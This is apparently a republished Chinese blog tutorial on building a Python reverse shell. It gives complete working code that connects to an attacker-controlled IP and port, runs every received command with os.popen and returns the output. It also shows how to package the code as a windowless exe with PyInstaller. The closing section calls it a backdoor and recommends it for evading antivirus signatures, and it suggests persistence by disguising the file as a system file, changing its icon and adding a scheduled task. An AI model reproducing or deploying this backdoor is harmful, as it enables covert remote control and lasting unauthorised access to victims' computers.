远控终端的本质
1、服务端(攻击者)传输消息 ----> socket连接 ----> 客户端(被攻击者)接收消息
2、客户端执行消息内容(即执行服务端传回来的命令)
3、客户端传输执行结果 ----> socket连接 ----> 服务端显示命令执行结果
python制作简易的远控
1、环境
环境:PyCharm 2021.1.1 x64 + python3.8
2、新建项目
打开pycharm,直接新建一个纯python项目。
将main.py文件中原有的代码全部清空。
3、编写程序
(1)导入需要使用的包
|
1
2
3
|
# 导入所需要的包import osfrom socket import * |
(2)创建main并配置socket套接字信息
|
1
2
3
4
5
6
7
8
9
10
11
|
#导入所需要的包......if __name__ == '__main__': # 1、服务端IP地址 IP = "192.168.6.142" # 2、服务端监听的端口PORT PORT = 9999 # 3、socket套接字 socket_info = (IP, PORT) |
(3)创建连接方法
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
#导入所需要的包......def remote_control(info): # 初始化socket连接 skt = socket(AF_INET, SOCK_STREAM) skt.connect(info) # 获得客户端角色,便于服务端执行下一步操作 host = os.popen("whoami").read().strip() # 将客户端角色在每次输入命令的都显示,美化格式 tips = f"$({host}) " skt.send(tips.encode())if __name__ == '__main__': ...... # 4、连接 remote_control(socket_info) |
(4)接收服务端传入的数据(即命令)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
# 导入所需要的包......def remote_control(info): # 初始化socket连接 ...... skt.send(tips.encode()) # 建立持续连接 while True: # 接收服务端传入的数据(即命令),以1024个bit为一个单位 data = skt.recv(1024) # 将接收的数据进行utf-8解码,并将左右空格去除 command = data.decode('utf-8').strip() # 如果数据为exit,代表服务端想要断开连接,直接退出程序 if command == 'exit': skt.send("exit\n".encode()) exit(0)if __name__ == '__main__': ...... |
(5)执行服务端传入的命令并将结果返回给服务端
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
# 导入所需要的包......def remote_control(info): # 初始化socket连接 ...... skt.send(tips.encode()) # 建立持续连接 while True: # 接收服务端传入的数据(即命令),以1024个bit为一个单位 ...... if command == 'exit': ...... # 如果数据不为exit,执行数据的内容,即执行服务端传回来的命令,并将执行结果存放在result中 result = os.popen(command).read() # 将命令执行的结果返回给服务端 skt.send((result + tips).encode()) # 关闭socket连接 skt.close()if __name__ == '__main__': ...... |
代码编写完成!
(6)测试远控终端的可用性
打开一台kali虚拟机(IP为192.168.6.142)作为服务端,使用nc监听9999端口。
连接成功,远控终端制作完成!
4、将python文件打包成exe文件
(1)pip工具安装Pyinstaller模块
Win+R打开运行 --> 输入cmd打开命令窗口
|
1
|
pip install Pyinstaller |
(2)切换命令行的路径到需要打包的Python源文件的文件夹路径下
cd 文件路径
(3)打包python文件为exe文件
Pyinstaller -F -w 文件名.py
打包成功!
打包完成后,在要打包文件的同级目录下会新增一个dist文件夹,exe文件就在dist文件夹中。
(4)测试exe文件的可用性
kali服务端监听端口。
点击运行生成的exe文件。
连接成功!python制作远程控制终端完成!
制作远控终端的意义
本篇文章我们研究了python如何制作一个简易的远控终端,上篇我的文章研究了Java如何制作一个简易的远控终端。其实,我们制作的这个远控终端就是一个后门程序。那么大家就想了,我们的CS跟MSF都可以生成后门程序,为什么我们还要自己制作呢?
这是因为,我们不仅可以通过自己制作了解远控程序的原理。而且,由于CS跟MSF生成的后门程序特征比较明显,很多杀毒软件都会杀掉,即使没有杀掉,两三天以后也可能被杀软杀掉,不能做到一个持续化的权限获取,也就是权限维持。而我们自己制作后门程序,是我们自己写的,并没有被公开,杀软就匹配不到我们的特征值,这样杀软就不会杀掉我们的后门程序。如果我们再将我们的后门名称改为系统文件的名称,再改变图标,把后门程序添加到计划任务中,这样我们就可以做到一个很好的一个权限维持。
附完整代码
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
# 导入所需要的包import osfrom socket import *def remote_control(info): # 初始化socket连接 skt = socket(AF_INET, SOCK_STREAM) skt.connect(info) # 获得客户端角色,便于服务端执行下一步操作 host = os.popen("whoami").read().strip() # 将客户端角色在每次输入命令的都显示,美化格式 tips = f"$({host}) " skt.send(tips.encode()) # 建立持续连接 while True: # 接收服务端传入的数据(即命令),以1024个bit为一个单位 data = skt.recv(1024) # 将接收的数据进行utf-8解码,并将左右空格去除 command = data.decode('utf-8').strip() # 如果数据为exit,代表服务端想要断开连接,直接退出程序 if command == 'exit': skt.send("exit\n".encode()) exit(0) # 如果数据不为exit,执行数据的内容,即执行服务端传回来的命令,并将执行结果存放在result中 result = os.popen(command).read() # 将命令执行的结果返回给服务端 skt.send((result + tips).encode()) # 关闭socket连接 skt.close()if __name__ == '__main__': # 1、服务端IP地址 IP = "192.168.6.142" # 2、服务端监听的端口PORT PORT = 9999 # 3、socket套接字 socket_info = (IP, PORT) # 4、连接 remote_control(socket_info) |
以上就是使用Python制作一个简易的远控终端的详细内容,更多关于Python远控终端的资料请关注服务器之家其它相关文章!
原文链接:https://blog.csdn.net/weixin_52635170/article/details/129796414
